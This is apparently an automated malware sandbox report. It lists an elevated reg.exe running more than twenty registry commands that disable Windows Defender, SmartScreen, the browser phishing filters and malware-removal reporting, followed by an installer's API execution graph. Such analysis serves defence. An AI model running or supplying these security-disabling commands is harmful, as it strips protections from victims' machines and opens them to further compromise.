                            Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:03:52:55
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:03:52:56
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:03:52:57
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:03:52:58
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:03:52:58
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:03:52:58
                            Start date:12/07/2024
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                            Imagebase:0x8f0000
                            File size:59'392 bytes
                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:15%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:16.5%
                              Total number of Nodes:1356
                              Total number of Limit Nodes:23
                              execution_graph 3657 402643 3658 402672 3657->3658 3659 402657 3657->3659 3661 4026a2 3658->3661 3662 402677 3658->3662 3674 402d89 3659->3674 3663 402dab 21 API calls 3661->3663 3664 402dab 21 API calls 3662->3664 3665 4026a9 lstrlenW 3663->3665 3666 40267e 3664->3666 3670 40265e 3665->3670 3677 406556 WideCharToMultiByte 3666->3677 3668 402692 lstrlenA 3668->3670 3669 4026ec 3670->3669 3673 4026d6 3670->3673 3678 406105 SetFilePointer 3670->3678 3671 4060d6 WriteFile 3671->3669 3673->3669 3673->3671 3675 406571 21 API calls 3674->3675 3676 402d9e 3675->3676 3676->3670 3677->3668 3679 406121 3678->3679 3681 406139 3678->3681 3680 4060a7 ReadFile 3679->3680 3682 40612d 3680->3682 3681->3673 3682->3681 3683 406142 SetFilePointer 3682->3683 3684 40616a SetFilePointer 3682->3684 3683->3684 3685 40614d 3683->3685 3684->3681 3686 4060d6 WriteFile 3685->3686 3686->3681 3687 403bc4 3688 403bcf 3687->3688 3689 403bd3 3688->3689 3690 403bd6 GlobalAlloc 3688->3690 3690->3689 3224 401946 3225 401948 3224->3225 3226 402dab 21 API calls 3225->3226 3227 40194d 3226->3227 3230 405c40 3227->3230 3266 405f0b 3230->3266 3233 405c68 DeleteFileW 3235 401956 3233->3235 3234 405c7f 3236 405d9f 3234->3236 3280 406534 lstrcpynW 3234->3280 3236->3235 3243 406891 2 API calls 3236->3243 3238 405ca5 3239 405cb8 3238->3239 3240 405cab lstrcatW 3238->3240 3281 405e4f lstrlenW 3239->3281 3241 405cbe 3240->3241 3245 405cce lstrcatW 3241->3245 3246 405cd9 lstrlenW FindFirstFileW 3241->3246 3244 405dc4 3243->3244 3244->3235 3247 405e03 3 API calls 3244->3247 3245->3246 3246->3236 3264 405cfb 3246->3264 3248 405dce 3247->3248 3250 405bf8 5 API calls 3248->3250 3249 405d82 FindNextFileW 3253 405d98 FindClose 3249->3253 3249->3264 3252 405dda 3250->3252 3254 405df4 3252->3254 3255 405dde 3252->3255 3253->3236 3257 4055b9 28 API calls 3254->3257 3255->3235 3258 4055b9 28 API calls 3255->3258 3257->3235 3260 405deb 3258->3260 3259 405c40 64 API calls 3259->3264 3262 4062f4 40 API calls 3260->3262 3261 4055b9 28 API calls 3261->3249 3262->3235 3263 4055b9 28 API calls 3263->3264 3264->3249 3264->3259 3264->3261 3264->3263 3285 406534 lstrcpynW 3264->3285 3286 405bf8 3264->3286 3294 4062f4 MoveFileExW 3264->3294 3299 406534 lstrcpynW 3266->3299 3268 405f1c 3300 405eae CharNextW CharNextW 3268->3300 3271 405c60 3271->3233 3271->3234 3272 4067e2 5 API calls 3278 405f32 3272->3278 3273 405f63 lstrlenW 3274 405f6e 3273->3274 3273->3278 3276 405e03 3 API calls 3274->3276 3275 406891 2 API calls 3275->3278 3277 405f73 GetFileAttributesW 3276->3277 3277->3271 3278->3271 3278->3273 3278->3275 3279 405e4f 2 API calls 3278->3279 3279->3273 3280->3238 3282 405e5d 3281->3282 3283 405e63 CharPrevW 3282->3283 3284 405e6f 3282->3284 3283->3282 3283->3284 3284->3241 3285->3264 3287 405fff 2 API calls 3286->3287 3288 405c04 3287->3288 3289 405c13 RemoveDirectoryW 3288->3289 3290 405c1b DeleteFileW 3288->3290 3292 405c25 3288->3292 3291 405c21 3289->3291 3290->3291 3291->3292 3293 405c31 SetFileAttributesW 3291->3293 3292->3264 3293->3292 3295 406317 3294->3295 3296 406308 3294->3296 3295->3264 3306 40617a 3296->3306 3299->3268 3301 405ecb 3300->3301 3305 405edd 3300->3305 3302 405ed8 CharNextW 3301->3302 3301->3305 3303 405f01 3302->3303 3303->3271 3303->3272 3304 405e30 CharNextW 3304->3305 3305->3303 3305->3304 3307 4061d0 GetShortPathNameW 3306->3307 3308 4061aa 3306->3308 3310 4061e5 3307->3310 3311 4062ef 3307->3311 3333 406024 GetFileAttributesW CreateFileW 3308->3333 3310->3311 3313 4061ed wsprintfA 3310->3313 3311->3295 3312 4061b4 CloseHandle GetShortPathNameW 3312->3311 3314 4061c8 3312->3314 3315 406571 21 API calls 3313->3315 3314->3307 3314->3311 3316 406215 3315->3316 3334 406024 GetFileAttributesW CreateFileW 3316->3334 3318 406222 3318->3311 3319 406231 GetFileSize GlobalAlloc 3318->3319 3320 406253 3319->3320 3321 4062e8 CloseHandle 3319->3321 3322 4060a7 ReadFile 3320->3322 3321->3311 3323 40625b 3322->3323 3323->3321 3335 405f89 lstrlenA 3323->3335 3326 406272 lstrcpyA 3330 406294 3326->3330 3327 406286 3328 405f89 4 API calls 3327->3328 3328->3330 3329 4062cb SetFilePointer 3331 4060d6 WriteFile 3329->3331 3330->3329 3332 4062e1 GlobalFree 3331->3332 3332->3321 3333->3312 3334->3318 3336 405fca lstrlenA 3335->3336 3337 405fd2 3336->3337 3338 405fa3 lstrcmpiA 3336->3338 3337->3326 3337->3327 3338->3337 3339 405fc1 CharNextA 3338->3339 3339->3336 3340 4015c6 3341 402dab 21 API calls 3340->3341 3342 4015cd 3341->3342 3343 405eae 4 API calls 3342->3343 3356 4015d6 3343->3356 3344 401636 3346 401668 3344->3346 3347 40163b 3344->3347 3345 405e30 CharNextW 3345->3356 3350 401423 28 API calls 3346->3350 3365 401423 3347->3365 3355 401660 3350->3355 3354 40164f SetCurrentDirectoryW 3354->3355 3356->3344 3356->3345 3357 40161c GetFileAttributesW 3356->3357 3359 405aff 3356->3359 3362 405a88 CreateDirectoryW 3356->3362 3369 405ae2 CreateDirectoryW 3356->3369 3357->3356 3360 406928 5 API calls 3359->3360 3361 405b06 3360->3361 3361->3356 3363 405ad4 3362->3363 3364 405ad8 GetLastError 3362->3364 3363->3356 3364->3363 3366 4055b9 28 API calls 3365->3366 3367 401431 3366->3367 3368 406534 lstrcpynW 3367->3368 3368->3354 3370 405af2 3369->3370 3371 405af6 GetLastError 3369->3371 3370->3356 3371->3370 3691 401c48 3692 402d89 21 API calls 3691->3692 3693 401c4f 3692->3693 3694 402d89 21 API calls 3693->3694 3695 401c5c 3694->3695 3696 401c71 3695->3696 3697 402dab 21 API calls 3695->3697 3698 401c81 3696->3698 3699 402dab 21 API calls 3696->3699 3697->3696 3700 401cd8 3698->3700 3701 401c8c 3698->3701 3699->3698 3702 402dab 21 API calls 3700->3702 3703 402d89 21 API calls 3701->3703 3704 401cdd 3702->3704 3705 401c91 3703->3705 3706 402dab 21 API calls 3704->3706 3707 402d89 21 API calls 3705->3707 3708 401ce6 FindWindowExW 3706->3708 3709 401c9d 3707->3709 3712 401d08 3708->3712 3710 401cc8 SendMessageW 3709->3710 3711 401caa SendMessageTimeoutW 3709->3711 3710->3712 3711->3712 3713 4028c9 3714 4028cf 3713->3714 3715 4028d7 FindClose 3714->3715 3716 402c2f 3714->3716 3715->3716 3720 4016d1 3721 402dab 21 API calls 3720->3721 3722 4016d7 GetFullPathNameW 3721->3722 3723 4016f1 3722->3723 3729 401713 3722->3729 3725 406891 2 API calls 3723->3725 3723->3729 3724 401728 GetShortPathNameW 3726 402c2f 3724->3726 3727 401703 3725->3727 3727->3729 3730 406534 lstrcpynW 3727->3730 3729->3724 3729->3726 3730->3729 3731 401e53 GetDC 3732 402d89 21 API calls 3731->3732 3733 401e65 GetDeviceCaps MulDiv ReleaseDC 3732->3733 3734 402d89 21 API calls 3733->3734 3735 401e96 3734->3735 3736 406571 21 API calls 3735->3736 3737 401ed3 CreateFontIndirectW 3736->3737 3738 40263d 3737->3738 3739 402955 3740 402dab 21 API calls 3739->3740 3741 402961 3740->3741 3742 402977 3741->3742 3743 402dab 21 API calls 3741->3743 3744 405fff 2 API calls 3742->3744 3743->3742 3745 40297d 3744->3745 3767 406024 GetFileAttributesW CreateFileW 3745->3767 3747 40298a 3748 402a40 3747->3748 3749 4029a5 GlobalAlloc 3747->3749 3750 402a28 3747->3750 3751 402a47 DeleteFileW 3748->3751 3752 402a5a 3748->3752 3749->3750 3753 4029be 3749->3753 3754 4032b9 35 API calls 3750->3754 3751->3752 3768 4034c7 SetFilePointer 3753->3768 3756 402a35 CloseHandle 3754->3756 3756->3748 3757 4029c4 3758 4034b1 ReadFile 3757->3758 3759 4029cd GlobalAlloc 3758->3759 3760 402a11 3759->3760 3761 4029dd 3759->3761 3763 4060d6 WriteFile 3760->3763 3762 4032b9 35 API calls 3761->3762 3766 4029ea 3762->3766 3764 402a1d GlobalFree 3763->3764 3764->3750 3765 402a08 GlobalFree 3765->3760 3766->3765 3767->3747 3768->3757 3769 4014d7 3770 402d89 21 API calls 3769->3770 3771 4014dd Sleep 3770->3771 3773 402c2f 3771->3773 3774 40195b 3775 402dab 21 API calls 3774->3775 3776 401962 lstrlenW 3775->3776 3777 40263d 3776->3777 3387 4020dd 3388 4020ef 3387->3388 3398 4021a1 3387->3398 3389 402dab 21 API calls 3388->3389 3390 4020f6 3389->3390 3392 402dab 21 API calls 3390->3392 3391 401423 28 API calls 3393 4022fb 3391->3393 3394 4020ff 3392->3394 3395 402115 LoadLibraryExW 3394->3395 3396 402107 GetModuleHandleW 3394->3396 3397 402126 3395->3397 3395->3398 3396->3395 3396->3397 3407 406997 3397->3407 3398->3391 3401 402170 3403 4055b9 28 API calls 3401->3403 3402 402137 3404 401423 28 API calls 3402->3404 3405 402147 3402->3405 3403->3405 3404->3405 3405->3393 3406 402193 FreeLibrary 3405->3406 3406->3393 3412 406556 WideCharToMultiByte 3407->3412 3409 4069b4 3410 4069bb GetProcAddress 3409->3410 3411 402131 3409->3411 3410->3411 3411->3401 3411->3402 3412->3409 3778 40495d 3779 404993 3778->3779 3780 40496d 3778->3780 3788 40451a 3779->3788 3785 4044b3 3780->3785 3783 40497a SetDlgItemTextW 3783->3779 3786 406571 21 API calls 3785->3786 3787 4044be SetDlgItemTextW 3786->3787 3787->3783 3789 4045dd 3788->3789 3790 404532 GetWindowLongW 3788->3790 3790->3789 3791 404547 3790->3791 3791->3789 3792 404574 GetSysColor 3791->3792 3793 404577 3791->3793 3792->3793 3794 404587 SetBkMode 3793->3794 3795 40457d SetTextColor 3793->3795 3796 4045a5 3794->3796 3797 40459f GetSysColor 3794->3797 3795->3794 3798 4045ac SetBkColor 3796->3798 3799 4045b6 3796->3799 3797->3796 3798->3799 3799->3789 3800 4045d0 CreateBrushIndirect 3799->3800 3801 4045c9 DeleteObject 3799->3801 3800->3789 3801->3800 3802 402b5e 3803 402bb0 3802->3803 3805 402b65 3802->3805 3804 406928 5 API calls 3803->3804 3807 402bb7 3804->3807 3806 402bae 3805->3806 3808 402d89 21 API calls 3805->3808 3809 402dab 21 API calls 3807->3809 3810 402b73 3808->3810 3812 402bc0 3809->3812 3811 402d89 21 API calls 3810->3811 3815 402b7f 3811->3815 3812->3806 3813 402bc4 IIDFromString 3812->3813 3813->3806 3814 402bd3 3813->3814 3814->3806 3820 406534 lstrcpynW 3814->3820 3819 40647b wsprintfW 3815->3819 3817 402bf0 CoTaskMemFree 3817->3806 3819->3806 3820->3817 3821 402a60 3822 402d89 21 API calls 3821->3822 3823 402a66 3822->3823 3824 402933 3823->3824 3825 402aa9 3823->3825 3826 402a8d 3823->3826 3827 402ac3 3825->3827 3828 402ab3 3825->3828 3829 402a92 3826->3829 3834 402aa3 3826->3834 3831 406571 21 API calls 3827->3831 3830 402d89 21 API calls 3828->3830 3835 406534 lstrcpynW 3829->3835 3830->3834 3831->3834 3834->3824 3836 40647b wsprintfW 3834->3836 3835->3824 3836->3824 3119 401761 3125 402dab 3119->3125 3123 40176f 3124 406053 2 API calls 3123->3124 3124->3123 3126 402db7 3125->3126 3127 406571 21 API calls 3126->3127 3128 402dd8 3127->3128 3129 401768 3128->3129 3130 4067e2 5 API calls 3128->3130 3131 406053 3129->3131 3130->3129 3132 406060 GetTickCount GetTempFileNameW 3131->3132 3133 40609a 3132->3133 3134 406096 3132->3134 3133->3123 3134->3132 3134->3133 3837 401d62 3838 402d89 21 API calls 3837->3838 3839 401d73 SetWindowLongW 3838->3839 3840 402c2f 3839->3840 3841 4028e3 3842 4028eb 3841->3842 3843 4028ef FindNextFileW 3842->3843 3845 402901 3842->3845 3844 402948 3843->3844 3843->3845 3847 406534 lstrcpynW 3844->3847 3847->3845 3848 401568 3849 402ba9 3848->3849 3852 40647b wsprintfW 3849->3852 3851 402bae 3852->3851 3853 4045e9 lstrcpynW lstrlenW 3854 40196d 3855 402d89 21 API calls 3854->3855 3856 401974 3855->3856 3857 402d89 21 API calls 3856->3857 3858 401981 3857->3858 3859 402dab 21 API calls 3858->3859 3860 401998 lstrlenW 3859->3860 3861 4019a9 3860->3861 3862 4019ea 3861->3862 3866 406534 lstrcpynW 3861->3866 3864 4019da 3864->3862 3865 4019df lstrlenW 3864->3865 3865->3862 3866->3864 3867 40166f 3868 402dab 21 API calls 3867->3868 3869 401675 3868->3869 3870 406891 2 API calls 3869->3870 3871 40167b 3870->3871 3872 402af0 3873 402d89 21 API calls 3872->3873 3874 402af6 3873->3874 3875 406571 21 API calls 3874->3875 3876 402933 3874->3876 3875->3876 3877 4026f1 3878 402d89 21 API calls 3877->3878 3886 402700 3878->3886 3879 40274a ReadFile 3879->3886 3889 40283d 3879->3889 3880 4060a7 ReadFile 3880->3886 3881 406105 5 API calls 3881->3886 3882 40278a MultiByteToWideChar 3882->3886 3883 40283f 3890 40647b wsprintfW 3883->3890 3885 4027b0 SetFilePointer MultiByteToWideChar 3885->3886 3886->3879 3886->3880 3886->3881 3886->3882 3886->3883 3886->3885 3887 402850 3886->3887 3886->3889 3888 402871 SetFilePointer 3887->3888 3887->3889 3888->3889 3890->3889 3891 404672 3892 4047a4 3891->3892 3894 40468a 3891->3894 3893 40480e 3892->3893 3895 4048d8 3892->3895 3900 4047df GetDlgItem SendMessageW 3892->3900 3893->3895 3896 404818 GetDlgItem 3893->3896 3897 4044b3 22 API calls 3894->3897 3902 40451a 8 API calls 3895->3902 3898 404832 3896->3898 3899 404899 3896->3899 3901 4046f1 3897->3901 3898->3899 3907 404858 SendMessageW LoadCursorW SetCursor 3898->3907 3899->3895 3903 4048ab 3899->3903 3924 4044d5 EnableWindow 3900->3924 3905 4044b3 22 API calls 3901->3905 3906 4048d3 3902->3906 3908 4048c1 3903->3908 3909 4048b1 SendMessageW 3903->3909 3911 4046fe CheckDlgButton 3905->3911 3928 404921 3907->3928 3908->3906 3913 4048c7 SendMessageW 3908->3913 3909->3908 3910 404809 3925 4048fd 3910->3925 3922 4044d5 EnableWindow 3911->3922 3913->3906 3917 40471c GetDlgItem 3923 4044e8 SendMessageW 3917->3923 3919 404732 SendMessageW 3920 404758 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3919->3920 3921 40474f GetSysColor 3919->3921 3920->3906 3921->3920 3922->3917 3923->3919 3924->3910 3926 404910 SendMessageW 3925->3926 3927 40490b 3925->3927 3926->3893 3927->3926 3931 405b5a ShellExecuteExW 3928->3931 3930 404887 LoadCursorW SetCursor 3930->3899 3931->3930 3135 401774 3136 402dab 21 API calls 3135->3136 3137 40177b 3136->3137 3138 4017a3 3137->3138 3139 40179b 3137->3139 3206 406534 lstrcpynW 3138->3206 3205 406534 lstrcpynW 3139->3205 3142 4017a1 3146 4067e2 5 API calls 3142->3146 3143 4017ae 3207 405e03 lstrlenW CharPrevW 3143->3207 3150 4017c0 3146->3150 3151 4017d2 CompareFileTime 3150->3151 3152 401892 3150->3152 3153 401869 3150->3153 3156 406534 lstrcpynW 3150->3156 3162 406571 21 API calls 3150->3162 3169 405b94 MessageBoxIndirectW 3150->3169 3173 406024 GetFileAttributesW CreateFileW 3150->3173 3210 406891 FindFirstFileW 3150->3210 3213 405fff GetFileAttributesW 3150->3213 3151->3150 3174 4055b9 3152->3174 3155 4055b9 28 API calls 3153->3155 3163 40187e 3153->3163 3155->3163 3156->3150 3160 4018c3 SetFileTime 3161 4018d5 FindCloseChangeNotification 3160->3161 3161->3163 3164 4018e6 3161->3164 3162->3150 3165 4018eb 3164->3165 3166 4018fe 3164->3166 3167 406571 21 API calls 3165->3167 3168 406571 21 API calls 3166->3168 3170 4018f3 lstrcatW 3167->3170 3171 401906 3168->3171 3169->3150 